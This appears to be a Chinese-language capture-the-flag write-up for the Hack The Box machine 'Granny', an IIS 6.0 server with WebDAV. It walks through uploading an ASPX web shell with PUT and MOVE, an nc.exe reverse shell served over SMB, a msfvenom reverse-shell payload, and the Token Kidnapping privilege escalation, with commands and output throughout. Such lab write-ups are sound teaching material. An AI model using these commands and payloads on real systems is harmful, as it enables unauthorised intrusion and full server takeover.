[Hack The Box] Granny - writeup - websec資安小窩

Scanning and Enumeration:

nmap:

nmap -sC -sV -O 10.10.10.15

Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-08 00:42 EDT
Nmap scan report for 10.10.10.15
Host is up (0.20s latency).
Not shown: 999 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 6.0
| http-webdav-scan: 
| Server Type: Microsoft-IIS/6.0
| Server Date: Fri, 08 Sep 2023 04:42:57 GMT
| Allowed Methods: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK
| WebDAV type: Unknown
|_ Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
| http-methods: 
|_ Potentially risky methods: TRACE DELETE COPY MOVE PROPFIND PROPPATCH SEARCH MKCOL LOCK UNLOCK PUT
|_http-server-header: Microsoft-IIS/6.0
|_http-title: Under Construction
...
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 33.68 seconds

三個端口是開啟:
✎80/tcp open http Microsoft IIS httpd 6.0
http://10.10.10.15 打開之後顯示 Under Construction
網站的伺服器是使用Microsoft IIS，WebDAV 協議

WebDAV:

在nmap的掃瞄當中可以使用PUT method，可以嘗試使用這種方式上傳

80/tcp open http Microsoft IIS httpd 6.0
| http-webdav-scan: 
...
Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
...

davtest:

工具介紹:https://zing.gitbooks.io/kali-lunix/content/06x/6x07_DAVTest.html
使用davtest測試可以使用哪些method

davtest -url http://10.10.10.15

********************************************************
 Testing DAV connection
OPEN            SUCCEED:                http://10.10.10.15
********************************************************
NOTE    Random string for this session: Rq8TgfhAG5E9
********************************************************
 Creating directory
MKCOL           SUCCEED:                Created http://10.10.10.15/DavTestDir_Rq8TgfhAG5E9
********************************************************
 Sending test files
PUT     asp     FAIL
PUT     shtml   FAIL
PUT     html    SUCCEED:        http://10.10.10.15/DavTestDir_Rq8TgfhAG5E9/davtest_Rq8TgfhAG5E9.html
PUT     cfm     SUCCEED:        http://10.10.10.15/DavTestDir_Rq8TgfhAG5E9/davtest_Rq8TgfhAG5E9.cfm
PUT     php     SUCCEED:        http://10.10.10.15/DavTestDir_Rq8TgfhAG5E9/davtest_Rq8TgfhAG5E9.php
PUT     jhtml   SUCCEED:        http://10.10.10.15/DavTestDir_Rq8TgfhAG5E9/davtest_Rq8TgfhAG5E9.jhtml
PUT     cgi     FAIL
PUT     txt     SUCCEED:        http://10.10.10.15/DavTestDir_Rq8TgfhAG5E9/davtest_Rq8TgfhAG5E9.txt
PUT     jsp     SUCCEED:        http://10.10.10.15/DavTestDir_Rq8TgfhAG5E9/davtest_Rq8TgfhAG5E9.jsp
PUT     pl      SUCCEED:        http://10.10.10.15/DavTestDir_Rq8TgfhAG5E9/davtest_Rq8TgfhAG5E9.pl
PUT     aspx    FAIL
********************************************************
 Checking for test file execution
EXEC    html    SUCCEED:        http://10.10.10.15/DavTestDir_Rq8TgfhAG5E9/davtest_Rq8TgfhAG5E9.html
EXEC    html    FAIL
EXEC    cfm     FAIL
EXEC    php     FAIL
EXEC    jhtml   FAIL
EXEC    txt     SUCCEED:        http://10.10.10.15/DavTestDir_Rq8TgfhAG5E9/davtest_Rq8TgfhAG5E9.txt
EXEC    txt     FAIL
EXEC    jsp     FAIL
EXEC    pl      FAIL

********************************************************
/usr/bin/davtest Summary:
Created: http://10.10.10.15/DavTestDir_Rq8TgfhAG5E9
PUT File: http://10.10.10.15/DavTestDir_Rq8TgfhAG5E9/davtest_Rq8TgfhAG5E9.html
PUT File: http://10.10.10.15/DavTestDir_Rq8TgfhAG5E9/davtest_Rq8TgfhAG5E9.cfm
PUT File: http://10.10.10.15/DavTestDir_Rq8TgfhAG5E9/davtest_Rq8TgfhAG5E9.php
PUT File: http://10.10.10.15/DavTestDir_Rq8TgfhAG5E9/davtest_Rq8TgfhAG5E9.jhtml
PUT File: http://10.10.10.15/DavTestDir_Rq8TgfhAG5E9/davtest_Rq8TgfhAG5E9.txt
PUT File: http://10.10.10.15/DavTestDir_Rq8TgfhAG5E9/davtest_Rq8TgfhAG5E9.jsp
PUT File: http://10.10.10.15/DavTestDir_Rq8TgfhAG5E9/davtest_Rq8TgfhAG5E9.pl
Executes: http://10.10.10.15/DavTestDir_Rq8TgfhAG5E9/davtest_Rq8TgfhAG5E9.html
Executes: http://10.10.10.15/DavTestDir_Rq8TgfhAG5E9/davtest_Rq8TgfhAG5E9.txt

測試之後asp和aspx均沒辦法上傳
但txt可以正常上傳，並且可以使用MOVE method
可以透過PUT method 將 shellcode上傳至受害機
再透過MOVE method將檔案副檔名修改為aspx
上傳檔案有兩種方式，分別是curl和dave
cmd.aspx 下載位置

curl:

curl -X PUT http://10.10.10.15/cmd.txt -d @cmd.aspx 
curl -X MOVE -H 'Destination:http://10.10.10.15/cmd.aspx' http://10.10.10.15/cmd.txt

dave:

dave> open http://10.10.10.15
dave> PUT cmd.aspx.txt
dave> mv cmd.aspx.txt cmd.aspx

Exploit:

impacket-smbserver share /usr/share/windows-resources/binaries/ //這個資料夾裡面有nc.exe
rlwrap nc -lnvp 6666 //接收待會的reverse shell
http://10.10.10.15/cmd.aspx 
\\10.10.14.5\share\nc.exe 10.10.14.5 6666 -e cmd.exe //透過nc.exe發起連線

listening on [any] 6666 ...
connect to [10.10.14.5] from (UNKNOWN) [10.10.10.15] 1048
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
c:\windows\system32\inetsrv>whoami
whoami
nt authority\network service

Privilege Escalation

searchsploit Windows Server 2003 | grep -i priv --color

使用這個:
Microsoft Windows Server 2003 - Token Kidnapping Local Privilege Escalation | windows/local/6705.txt
searchsploit -m 6705
以下有編譯好的版本:
churrasco.exe

將churrasco.exe傳送至受害機，受害機未安裝powershell
這邊使用dave上傳
dave> open http://10.10.10.15
dave> put Churrasco.exe.txt
dave> move Churrasco.exe.txt Churrasco.exe
上傳過去的檔案會在 C:\Inetpub\wwwroot
再來要在攻擊機產生一份aspx reverse shell
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.5 LPORT=4444 -a x86 --platform windows -f exe -o privesc.exe.txt
再跟前面一樣的套路使用dave上傳並且改名稱
最後再使用Churrasco.exe執行reverse shell即可完成提權

Get FLAG:

C:\Documents and Settings\Administrator\Desktop>type root.txt
aa4beed1...


C:\Documents and Settings\Lakis\Desktop>type user.txt
700c5dc1...